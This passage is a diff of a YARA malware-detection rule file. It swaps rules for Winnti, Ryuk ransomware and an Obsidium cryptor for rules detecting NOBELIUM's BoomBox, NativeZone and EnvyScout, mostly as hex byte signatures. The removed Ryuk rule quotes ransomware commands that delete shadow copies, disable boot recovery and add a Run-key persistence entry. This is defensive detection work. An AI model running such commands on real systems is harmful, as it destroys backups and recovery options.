8d 43 10 48 39 8c 24 18 02 00 00 48 0f 46 8c 24 18 02 00 00 48 89 84 24 00 02 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 fe 4e f7 ff 45 84 ed 0f 84 fd fe ff ff 83 7c 24 10 01 0f 84 bc 04 00 00 48 8d 84 24 e0 03 00 00 4c 8d ac 24 c0 05 00 00 48 89 44 24 10 48 8d 84 24 10 04 00 00 48 89 44 24 08 49 8d 45 08 }
+		$seq3 = { 4c 8d bc 24 00 05 00 00 be 01 00 00 00 4c 89 ff e8 9b 4e f6 ff 4c 8d a4 24 30 05 00 00 4c 89 fa 4c 89 f6 4c 89 e7 e8 05 88 f6 ff 48 8d ac 24 60 05 00 00 48 8b 54 24 18 4c 89 e6 48 89 ef e8 5d d3 f6 ff 48 8d 84 24 90 05 00 00 4c 89 f1 4c 89 ea 48 89 ee 48 89 c7 48 89 44 24 28 e8 ef b9 ff ff 48 8b 74 24 28 49 8d 7e 60 e8 01 59 f6 ff 48 8b 94 24 b0 05 00 00 48 8b 8c 24 a0 05 00 00 48 8d 43 10 48 39 8c 24 a8 05 00 00 48 0f 46 8c 24 a8 05 00 00 48 89 84 24 90 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 ff 4d f7 ff 48 8b 94 24 80 05 00 00 48 8b 8c 24 70 05 00 00 48 8d 43 10 48 39 8c 24 78 05 00 00 48 0f 46 8c 24 78 05 00 00 48 89 84 24 60 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 bd 4d f7 ff 48 8b 94 24 50 05 00 00 48 8b 8c 24 40 05 00 00 48 8d 43 10 48 39 8c 24 48 05 00 00 48 0f 46 8c 24 48 05 00 00 48 89 84 24 30 05 00 00 }
+		$seq4 = { 49 89 ff 41 56 49 89 f6 41 55 41 54 55 53 49 8d 9e c8 01 00 00 48 81 ec f8 05 00 00 48 8d bc 24 d0 00 00 00 e8 e5 52 00 00 48 8d bc 24 00 01 00 00 be 06 0e 5d 00 e8 33 99 ff ff 48 8d b4 24 00 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 bb eb ff ff 48 8b 84 24 00 01 00 00 48 8d b4 24 60 04 00 00 49 8d 9e c0 01 00 00 48 8d 78 e8 e8 9b 10 fd ff 48 8d bc 24 20 01 00 00 be 79 e3 5b 00 e8 e9 98 ff ff 48 8d b4 24 20 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 71 eb ff ff 48 8b 84 24 20 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 58 10 fd ff 48 8d 7c 24 20 4c 89 f6 e8 6b 9d ff ff 48 8d bc 24 40 01 00 00 be 14 e4 5b 00 e8 99 98 ff ff 48 8d 54 24 20 48 8d b4 24 40 01 00 00 48 8d bc 24 d0 00 00 00 e8 1f eb ff ff 48 8b 84 24 40 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 06 10 fd ff 48 8b 44 24 20 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 f0 0f fd ff 48 8d bc 24 60 01 00 00 be 1d e4 5b 00 e8 3e 98 ff ff 48 8d bc 24 c0 00 00 00 e8 41 22 fd ff 48 8d b4 24 c0 00 00 00 48 8d bc 24 60 04 00 00 e8 cc 0f fd ff 48 8d 8c 24 60 04 00 00 48 8d b4 24 60 01 00 00 48 8d bc 24 d0 00 00 00 ba 3f 26 5e 00 e8 fa ce 00 00 48 8d bc 24 60 04 00 00 e8 7d 19 fd ff 48 8d bc 24 c0 00 00 00 e8 70 19 fd ff 48 8b 84 24 60 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 67 0f fd ff 48 8d bc 24 80 01 00 00 be 90 e4 5b 00 e8 b5 97 ff ff 48 8d b4 24 80 01 00 00 48 8d bc 24 d0 00 00 00 ba 48 38 8a 00 e8 3b ea ff ff 48 8b 84 24 80 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 22 0f fd ff 48 8d 94 24 20 04 00 00 48 8d b4 24 00 04 00 00 4c 89 f7 48 c7 84 24 00 04 00 00 78 24 8a 00 48 c7 84 24 20 04 00 00 78 24 8a 00 e8 f2 9c ff ff 48 8d bc 24 a0 01 00 00 be 24 e4 5b 00 e8 40 97 ff ff 48 8d 94 24 00 04 00 00 48 8d b4 24 a0 01 00 00 48 8d bc 24 d0 00 00 00 e8 c3 e9 ff ff 48 8b 84 24 a0 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 aa 0e fd ff 48 8d bc 24 c0 01 00 00 be 2d e4 5b 00 e8 f8 96 ff ff 48 8d 94 24 20 04 00 00 48 8d b4 24 c0 01 00 00 48 8d bc 24 d0 00 00 00 e8 7b e9 ff ff 48 8b 84 24 c0 01 00 00 48 8d b4 24 60 04 00 00 48 8d ac 24 e0 03 00 00 48 8d 78 e8 e8 5a 0e fd ff c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 e2 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 }
+		$seq5 = { e8 bb e4 fd ff 48 8d bc 24 40 04 00 00 48 89 84 24 e0 01 00 00 e8 b6 e9 05 00 48 89 c3 48 89 84 24 e8 01 00 00 e8 96 1d fd ff 8b 40 08 48 83 c3 08 be 33 e4 5b 00 48 89 df 89 84 24 f0 01 00 00 e8 7b e9 fd ff 48 8b b4 24 00 04 00 00 48 89 df 48 8b 56 e8 e8 67 e6 fd ff 48 8d bc 24 e0 01 00 00 e8 5a d9 fd ff 48 83 bc 24 40 04 00 00 00 75 8f c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 37 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 00 48 89 c6 }
+		$seq6 = { 48 8d bc 24 40 04 00 00 48 89 84 24 00 02 00 00 e8 0e e9 05 00 48 89 c3 48 89 84 24 08 02 00 00 e8 ee 1c fd ff 8b 40 08 48 83 c3 08 be 3e e4 5b 00 48 89 df 89 84 24 10 02 00 00 e8 d3 e8 fd ff 48 8b b4 24 20 04 00 00 48 89 df 48 8b 56 e8 e8 bf e5 fd ff 48 8d bc 24 00 02 00 00 e8 b2 d8 fd ff 48 83 bc 24 40 04 00 00 00 75 8f 48 8b 84 24 20 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 ee 0c fd ff 48 8b 84 24 00 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 d5 0c fd ff e8 10 c9 fe ff 84 c0 0f 84 48 02 00 00 48 8d 74 24 1d c6 04 24 00 48 89 ef e8 07 97 00 00 48 8b bc 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 c7 84 24 00 04 00 00 00 00 00 00 48 c7 84 24 08 04 00 00 00 00 00 00 48 c7 84 24 10 04 00 00 00 00 00 00 e8 3e db fe ff 84 c0 0f 84 c9 00 00 00 48 8b 84 24 08 04 00 00 48 2b 84 24 00 04 00 00 48 c1 f8 03 }
+		$seq7 = { 48 83 bc 24 40 04 00 00 00 75 95 48 8d bc 24 00 04 00 00 e8 b0 9e fe ff 48 8b bc 24 e8 03 00 00 48 85 ff 74 05 e8 0e 66 ff ff 48 8d bc 24 f0 00 00 00 e8 81 4d 00 00 48 8d b4 24 f0 00 00 00 4c 89 f7 e8 81 f0 ff ff 48 8d bc 24 40 04 00 00 be 02 e5 5b 00 e8 bf 93 ff ff 48 8d 94 24 f0 00 00 00 48 8d b4 24 40 04 00 00 48 8d bc 24 d0 00 00 00 e8 f2 d1 00 00 48 8b 84 24 40 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 29 0b fd ff 48 8d bc 24 60 04 00 00 be 18 00 00 00 e8 07 0e fd ff 48 8d bc 24 70 04 00 00 48 8d b4 24 d0 00 00 00 ba 01 00 00 00 e8 5d ad 00 00 48 8d b4 24 78 04 00 00 48 8d bc 24 b0 00 00 00 e8 38 0c fd ff 48 8d 94 24 b0 00 00 00 4c 89 f6 4c 89 ff e8 e5 c6 ff ff 48 8b 84 24 b0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 bc 0a fd ff 48 8d bc 24 60 04 00 00 e8 cf 16 fd ff 48 8d bc 24 f0 00 00 00 e8 52 4d 00 00 48 8d bc 24 d0 00 00 00 e8 45 4d 00 00 48 81 c4 f8 05 00 00 4c 89 f8 5b 5d 41 5c 41 5d }
+		$seq8 = { 4c 8d a4 24 64 05 00 00 66 0f 1f 44 00 00 e8 23 de fd ff 48 8d 94 24 20 04 00 00 48 8d bc 24 a0 03 00 00 48 89 c6 e8 eb df fd ff 48 8b 9c 24 a8 03 00 00 be f7 e4 5b 00 48 8d 7b 08 e8 f5 e2 fd ff 48 8d 7b 70 4c 89 e6 e8 d9 0b fd ff 48 8d bc 24 a0 03 00 00 e8 dc d2 fd ff 48 83 bc 24 20 04 00 00 00 75 a9 48 8d 84 24 c0 03 00 00 be 6c e4 5b 00 48 89 c7 48 89 44 24 08 e8 77 8f ff ff 48 8b 5c 24 08 48 8d 94 24 60 04 00 00 48 8d bc 24 d0 00 00 00 48 89 de e8 7a c8 00 00 48 8b 84 24 c0 03 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 e1 06 fd ff 48 8d b4 24 23 05 00 00 48 8d bc 24 a0 00 00 00 48 89 da e8 29 0d fd ff 48 8d 94 24 a0 03 00 00 48 8d b4 24 60 04 00 00 48 8d bc 24 90 00 00 00 e8 0c 0d fd ff 48 8d bc 24 90 00 00 00 be 90 d6 5c 00 e8 ba 16 fd ff 48 8b 10 48 89 94 24 20 04 00 00 48 c7 00 78 24 8a 00 48 8b 94 24 20 04 00 00 48 8b 84 24 a0 00 00 00 48 8b 4a e8 48 89 ce 48 03 70 e8 48 3b 72 f0 76 0a 48 3b 70 f0 0f 86 b7 08 00 00 48 8d b4 24 a0 00 00 00 48 8d bc 24 20 04 00 00 e8 08 0c fd ff 48 8b 10 be 8d e4 5b 00 48 89 ef 48 89 94 24 40 04 00 00 48 c7 00 78 24 8a 00 e8 89 8e ff ff 48 8d 94 24 40 04 00 00 48 8d bc 24 d0 00 00 00 48 89 ee e8 11 e1 ff ff 48 8b 84 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 f8 05 fd ff 48 8b 84 24 40 04 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 df 05 fd ff 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 c6 05 fd ff 48 8b 84 24 90 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 ad 05 fd ff 48 8b 84 24 a0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 94 05 fd ff 48 8d bc 24 00 04 00 00 be 4c e4 5b 00 e8 e2 8d ff ff 48 8d 94 24 e2 04 00 00 48 8d b4 24 00 04 00 00 48 8d bc 24 d0 00 00 00 e8 e5 c6 00 00 48 8b 84 24 00 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 4c 05 fd ff 48 8d bc 24 20 04 00 00 be 98 e4 5b 00 e8 9a 8d ff ff 48 8d 94 24 64 05 00 00 48 8d b4 24 20 04 00 00 48 8d bc 24 d0 00 00 00 e8 9d c6 00 00 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of ( $s* ) and 2 of ( $seq* )
+		uint32( 0 ) == 0x464c457f and filesize > 300KB and 7 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Winnti_Elfx64_Aug_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Boombox_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect of ELF implant used by APT Winnti in August 2020"
+		description = "Detect BoomBox malware"
 		author = "Arkbird_SOLG"
-		id = "112e8d60-cbcb-53a7-b458-d39ee03d5c22"
-		date = "2020-08-18"
-		modified = "2020-08-18"
-		reference = "https://twitter.com/KorbenD_Intel/status/1295725146037133312"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-18/Winnti/APT_Winnti_ELFx64_Aug_2020_1.yar#L1-L34"
+		id = "b2629c5b-1fb0-5ea1-8661-faf8f1d6b578"
+		date = "2021-05-28"
+		modified = "2021-06-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_BoomBox_May_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "ebe6e60c45336476fd91c4185eee0414c3eba83960301a610b69c8818dbb17fd"
+		logic_hash = "b88848ead9c992392c99e88a25541b72d825fbd32c3eb83fefc18e7cfbd08cc8"
 		score = 75
-		quality = 36
+		quality = 75
 		tags = "FILE"
-		hash1 = "6af8b3d31101f48911b13e49c660c10ed1d26b60267e8037d2ac174fc0d2f36c"
+		hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
+		hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
+		tlp = "White"
+		adversary = "NOBELIUM"
 
 	strings:
-		$lib1 = "/usr/bin/python2.7" fullword ascii
-		$lib2 = "libxselinux" fullword ascii
-		$c1 = "/cmdlineH" fullword ascii
-		$c2 = "/proc/%d/fd/%s" fullword ascii
-		$c3 = "/proc/self/exe" fullword ascii
-		$c4 = "__gmon_start__" fullword ascii
-		$c5 = "_ITM_registerTMCloneTable" fullword ascii
-		$c6 = "_ITM_deregisterTMCloneTable" fullword ascii
-		$d1 = "/usr/bin/netstat" fullword ascii
-		$d2 = "/var/run/libudev.pid" fullword ascii
-		$d3 = "/sbin/ifup-local" fullword ascii
-		$s1 = "EAEC2CA4-AF8D-4F61-8115-9EC26F6BF4E1" fullword ascii
-		$s2 = "readdir64" fullword ascii
-		$s3 = ".note.gnu.gold-version" fullword ascii
-		$s4 = ".note.gnu.build-id" fullword ascii
-		$s5 = ".eh_frame_hdr" fullword ascii
-		$s6 = "xlstat" fullword ascii
-		$s7 = "1YZ[\\<@nYSLRR]H_PGX[XmYXGFrstuvwxyz{|}~" fullword ascii
-		$info1 = "check_is_our_proc_dir" fullword ascii
-		$info2 = "get_our_sockets" fullword ascii
-		$info3 = "is_invisible_with_pids" fullword ascii
-		$info4 = "check_if_number" fullword ascii
-		$info5 = "get_our_pids" fullword ascii
+		$s1 = { 13 30 06 00 90 01 00 00 07 00 00 11 1f 1a 28 53 00 00 0a 25 72 bc 05 00 70 28 1e 00 00 0a 0a 06 28 54 00 00 0a 2d 07 06 28 55 00 00 0a 26 72 ea 05 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 22 07 28 55 00 00 0a 26 07 72 12 06 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 07 07 28 55 00 00 0a 26 73 08 00 00 06 25 7e 08 00 00 04 72 1c 06 00 70 6f 06 00 00 06 0c 08 2c 46 08 8e 69 1f 11 59 8d 2b 00 00 01 13 04 08 1f 0a 11 04 16 11 04 8e 69 28 56 00 00 0a 73 05 00 00 06 11 04 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 05 06 72 3c 06 00 70 28 1e 00 00 0a 11 05 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 46 7e 59 00 00 0a 72 64 06 00 70 17 6f 5a 00 00 0a 13 06 11 06 72 c0 06 00 70 6f 5b 00 00 0a 2d 26 11 06 72 c0 06 00 70 72 e8 06 00 70 06 72 3c 06 00 70 28 1e 00 00 0a 72 12 07 00 70 28 5c 00 00 0a 6f 5d 00 00 0a 7e 08 00 00 04 72 38 07 00 70 6f 06 00 00 06 0d 09 2c 46 09 8e 69 1f 11 59 8d 2b 00 00 01 13 07 09 1f 0a 11 07 16 11 07 8e 69 28 56 00 00 0a 73 05 00 00 06 11 07 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 08 07 72 58 07 00 70 28 1e 00 00 0a 11 08 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 16 72 84 07 00 70 06 72 9e 07 00 70 28 1e 00 00 0a 28 5e 00 00 0a 26 2a }
+		$s2 = { 13 30 05 00 11 01 00 00 05 00 00 11 02 7b 02 00 00 04 72 0b 03 00 70 28 1e 00 00 0a 28 30 00 00 0a 74 2d 00 00 01 25 20 c0 d4 01 00 6f 31 00 00 0a 25 72 86 01 00 70 6f 32 00 00 0a 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 8d 02 00 70 03 28 1e 00 00 0a 6f 36 00 00 0a 25 72 2b 03 00 70 6f 3f 00 00 0a 72 9d 02 00 70 04 72 5d 03 00 70 28 37 00 00 0a 0a 25 6f 35 00 00 0a 72 bb 02 00 70 06 6f 38 00 00 0a 25 6f 40 00 00 0a 05 16 05 8e 69 6f 2e 00 00 0a 6f 39 00 00 0a 74 1a 00 00 01 0b 07 6f 3a 00 00 0a 20 c8 00 00 00 33 64 07 6f 3e 00 00 0a 73 41 00 00 0a 6f 42 00 00 0a 0c 02 7b 06 00 00 04 08 6f 43 00 00 0a 6f 44 00 00 0a 17 6f 45 00 00 0a 6f 46 00 00 0a 72 02 04 00 70 28 47 00 00 0a 2c 29 02 7b 03 00 00 04 08 6f 43 00 00 0a 26 02 7b 04 00 00 04 08 6f 43 00 00 0a 26 02 7b 05 00 00 04 08 6f 43 00 00 0a 26 17 2a 16 2a 16 2a }
+		$s3 = { 13 30 04 00 6d 01 00 00 0a 00 00 11 72 f2 07 00 70 28 54 00 00 0a 39 5d 01 00 00 72 [2] 00 70 72 f2 07 00 70 28 5e 00 00 0a 26 1f 1a 28 53 00 00 0a 72 ?? 08 00 70 28 1e 00 00 0a 28 58 00 00 0a 3a 32 01 00 00 1f 0a 8d 2b 00 00 01 25 d0 0c 00 00 04 28 67 00 00 0a 0a 1d 8d 2b 00 00 01 25 d0 0b 00 00 04 28 67 00 00 0a 0b 28 4b 00 00 0a 6f 4c 00 00 0a 28 0c 00 00 06 26 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 0c 00 00 06 0c 73 0a 00 00 06 6f 09 00 00 06 0d 09 2c 56 28 68 00 00 0a 09 6f 61 00 00 0a 13 05 73 05 00 00 06 11 05 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 06 06 11 06 28 0d 00 00 06 13 07 11 07 07 28 0d 00 00 06 13 07 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 07 6f 07 00 00 06 26 28 0b 00 00 06 28 4b 00 00 0a 6f 4c 00 00 0a 13 04 11 04 72 d5 00 00 70 28 69 00 00 0a 2c 65 73 02 00 00 06 11 04 6f 01 00 00 06 13 08 11 08 2c 53 73 05 00 00 06 28 68 00 00 0a 11 08 6f 61 00 00 0a 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 09 06 11 09 28 0d 00 00 06 13 0a 11 0a 07 28 0d 00 00 06 13 0a 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 0a 6f 07 00 00 06 26 2a }
+		$s4 = { 1b 30 05 00 b5 00 00 00 06 00 00 11 72 76 05 00 70 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 10 00 00 0a 0a 72 84 05 00 70 28 4b 00 00 0a 6f 4c 00 00 0a 28 10 00 00 0a 0b 72 90 05 00 70 0c 28 4d 00 00 0a 28 49 00 00 0a 6f 4e 00 00 0a 13 04 16 13 05 2b 2a 11 04 11 05 9a 13 06 11 06 6f 4f 00 00 0a 18 33 13 08 11 06 6f 50 00 00 0a 72 98 05 00 70 28 37 00 00 0a 0c 11 05 17 58 13 05 11 05 11 04 8e 69 32 ce 28 51 00 00 0a 6f 52 00 00 0a 0d 72 9c 05 00 70 1a 8d 10 00 00 01 25 16 06 a2 25 17 07 a2 25 18 08 a2 25 19 09 a2 28 1d 00 00 0a 13 07 de 06 26 14 13 07 de 00 11 07 2a 00 00 00 01 10 00 00 00 00 00 00 ac ac 00 06 10 00 00 01 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 15KB and ( 1 of ( $lib* ) and 4 of ( $c* ) and 2 of ( $d* ) and 4 of ( $s* ) and 3 of ( $info* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Nativezone_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect RYUK ransomware (Sept_2020_V1)"
+		description = "Detect NativeZone malware"
 		author = "Arkbird_SOLG"
-		id = "7ade43ef-cd31-5308-b5ab-71f04d27018b"
-		date = "2020-10-25"
-		modified = "2020-10-27"
+		id = "5b858a8d-6e6a-5712-a83a-229bed1c7872"
+		date = "2021-05-28"
+		modified = "2021-06-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_1.yar#L1-L29"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_NativeZone_May_2021_1.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "b70eb2e5f58076ea8d4d1370649358acf68f3119cb2be6d5ef0a302bb3bf5d1e"
+		logic_hash = "9281784100e922fe3ef64e7c112276ffa5f8691ab4f24f1b68fbb0495e449bd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b"
-		hash2 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8"
-		hash3 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399"
+		hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
+		hash2 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
+		tlp = "White"
+		adversary = "NOBELIUM"
 
 	strings:
-		$c1 = "\" /TR \"C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,50) do start wordpad.exe /p " fullword ascii
-		$c2 = "cmd.exe /c \"bootstatuspolicy ignoreallfailures\"" fullword ascii
-		$c3 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$c4 = "cmd.exe /c \"WMIC.exe shadowcopy delete\"" fullword ascii
-		$c5 = "cmd.exe /c \"vssadmin.exe Delete Shadows /all /quiet\"" fullword ascii
-		$c6 = "cmd.exe /c \"bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\"" fullword ascii
-		$r1 = "/C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /t REG_SZ /d \"" fullword wide
-		$r2 = "/C REG DELETE \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /f" fullword wide
-		$ref1 = "lsaas.exe" fullword wide
-		$ref2 = "Ncsrss.exe" fullword wide
-		$ref3 = "$WGetCurrentProcess" fullword ascii
-		$ref4 = "lan.exe" fullword wide
-		$ref5 = "explorer.exe" fullword wide
-		$ref6 = "Ws2_32.dll" fullword ascii
-		$p1 = "\\users\\Public\\sys" fullword wide
-		$p2 = "\\Documents and Settings\\Default User\\sys" fullword wide
+		$s1 = { 8b ff 55 8b ec 81 ec 1c 01 00 00 a1 00 ?? 01 10 33 c5 89 45 fc 8b 4d 0c 53 8b 5d 14 56 8b 75 08 89 b5 fc fe ff ff 89 9d f8 fe ff ff 57 8b 7d 10 89 bd 00 ff ff ff 85 f6 75 25 85 c9 74 21 e8 [2] ff ff c7 00 16 00 00 00 e8 [2] ff ff 8b 4d fc 5f 5e 33 cd 5b e8 [2] ff ff 8b e5 5d c3 85 ff 74 db 85 db 74 d7 c7 85 f4 fe ff ff 00 00 00 00 83 f9 02 72 d8 49 0f af cf 03 ce 89 8d 04 ff ff ff 8b c1 33 d2 2b c6 f7 f7 8d 78 01 83 ff 08 0f 87 dc 00 00 00 8b bd 00 ff ff ff 3b ce 0f 86 a1 00 00 00 8d 14 37 89 95 ec fe ff ff 8d 49 00 8b c6 8b f2 89 85 08 ff ff ff 3b f1 77 31 8b ff 50 56 8b cb ff 15 [2] ?? 10 ff d3 83 c4 08 85 c0 7e 0a 8b c6 89 85 08 ff ff ff eb 06 8b 85 08 ff ff ff 8b 8d 04 ff ff ff 03 f7 3b f1 76 d1 8b d1 3b c1 74 34 2b c1 8b df 89 85 08 ff ff ff 90 8a 0c 10 8d 52 01 8b b5 08 ff ff ff 8a 42 ff 88 44 16 ff 8b c6 88 4a ff 83 eb 01 75 e3 8b 9d f8 fe ff ff 8b 8d 04 ff ff ff 8b b5 fc fe ff ff 2b cf 8b 95 ec fe ff ff 89 8d 04 ff ff ff 3b }
+		$s2 = { 8b b5 00 ff ff ff 8b cb 8b 85 fc fe ff ff d1 ef 0f af fe 03 f8 57 50 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 57 ff b5 fc fe ff ff e8 1b fe ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb ff b5 fc fe ff ff ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 15 56 ff b5 04 ff ff ff ff b5 fc fe ff ff e8 e9 fd ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb 57 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 ff b5 04 ff ff ff 57 e8 c1 fd ff ff 83 c4 0c 8b 85 04 ff ff ff 8b d8 8b b5 fc fe ff ff 8b 95 00 ff ff ff 89 85 08 ff ff ff 8d 64 24 00 3b fe 76 37 03 f2 89 b5 f0 fe ff ff 3b f7 73 25 8b 8d f8 fe ff ff 57 56 ff 15 [3] 10 ff 95 f8 fe ff ff 8b 95 00 ff ff ff 83 c4 08 85 c0 7e d3 3b fe 77 3d 8b 85 04 ff ff ff 8b 9d f8 fe ff ff 03 f2 3b f0 77 1f 57 56 8b cb ff 15 [3] 10 ff d3 8b 95 00 ff ff ff 83 c4 08 85 c0 8b 85 04 ff ff ff 7e db 8b 9d 08 ff ff ff 89 b5 f0 fe ff ff 8b b5 f8 fe ff ff eb 06 8d 9b 00 00 00 00 8b 95 00 ff ff ff 8b c3 2b da 89 85 08 ff ff ff 3b df 76 1f 57 53 8b ce ff 15 [3] 10 ff d6 83 c4 08 85 c0 7f d9 8b 95 00 ff ff ff 8b 85 08 ff ff ff 8b b5 f0 fe ff ff 89 9d 08 ff ff ff }
+		$s3 = { 8b 45 f4 89 7d f8 8d 04 86 8b c8 89 45 e8 8b c7 89 4d f4 3b 45 dc 74 5b 8b d6 2b d7 89 55 e4 8b 00 8b d0 89 45 ec 8d 42 01 89 45 f0 8a 02 42 84 c0 75 f9 2b 55 f0 8d 42 01 50 ff 75 ec 89 45 f0 8b 45 e8 2b c1 03 45 fc 50 51 e8 [2] 00 00 83 c4 10 85 c0 75 72 8b 45 f8 8b 55 e4 8b 4d f4 89 0c 02 83 c0 04 03 4d f0 89 4d f4 89 45 f8 3b 45 dc 75 ac 8b 45 0c 89 5d f8 89 30 8b f3 53 e8 [2] ff ff 59 8b 45 dc 8b d7 2b c2 89 55 e4 83 c0 03 c1 e8 02 39 55 dc 1b c9 f7 d1 23 c8 89 4d e8 74 18 8b f1 ff 37 e8 [2] ff ff 43 8d 7f 04 59 3b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $c* ) and 1 of ( $r* ) and 4 of ( $ref* ) and 1 of ( $p* )
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_Mem_Cryptor_Obsidium_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Envyscout_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect Obsidium cryptor by memory string"
+		description = "Detect EnvyScout downloader"
 		author = "Arkbird_SOLG"
-		id = "039c45f0-cc43-50ee-ae4e-a7e0e220dc04"
-		date = "2020-10-25"
-		modified = "2020-10-27"
+		id = "645f60d1-7c95-515c-a88e-d8528cf8b644"
+		date = "2021-05-28"
+		modified = "2021-06-02"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Mem_Cryptor_Obsidium_Oct_2020_1.yar#L1-L15"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_EnvyScout_May_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "5f471064505d7ab634b6d52f66fa0a96682af2eb1dd41afe4449543253c6bbf7"
+		logic_hash = "7ce4fd18c88f7ea7486c51fc0b673d178bd26ecc2f4a39ec9c5a4a71aaa0daa1"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
+		hash1 = "279d5ef8f80aba530aaac8afd049fa171704fc703d9cfe337b56639732e8ce11"
